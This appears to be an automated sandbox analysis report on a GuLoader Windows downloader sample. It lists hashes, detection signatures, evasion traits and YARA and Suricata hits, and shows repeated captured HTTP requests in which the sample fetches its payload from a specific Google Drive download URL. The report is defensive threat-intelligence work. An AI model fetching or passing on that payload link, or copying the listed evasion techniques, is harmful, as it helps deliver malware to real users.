Edit tour

Windows Analysis Report
eAvqHiIsgR.exe

Overview

General Information

Sample name:	eAvqHiIsgR.exe renamed because original name is a hash value
Original sample name:	e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7.exe
Analysis ID:	1567591
MD5:	61518cfded3109fac04ee916ab275c26
SHA1:	c624a4ee78183d82fb8264f74953d32ddcae5481
SHA256:	e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7
Tags:	exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected GuLoader

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

eAvqHiIsgR.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\eAvqHiIsgR.exe" MD5: 61518CFDED3109FAC04EE916AB275C26)

eAvqHiIsgR.exe (PID: 2200 cmdline: "C:\Users\user\Desktop\eAvqHiIsgR.exe" MD5: 61518CFDED3109FAC04EE916AB275C26)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.4521613318.00000000021F4000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000000.00000002.3670179410.0000000003404000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T17:24:46.747488+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49883	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: eAvqHiIsgR.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: eAvqHiIsgR.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: eAvqHiIsgR.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49957 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49958 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49990 version: TLS 1.2

Source: eAvqHiIsgR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\eAvqHiIsgR.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49883 -> 172.217.19.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
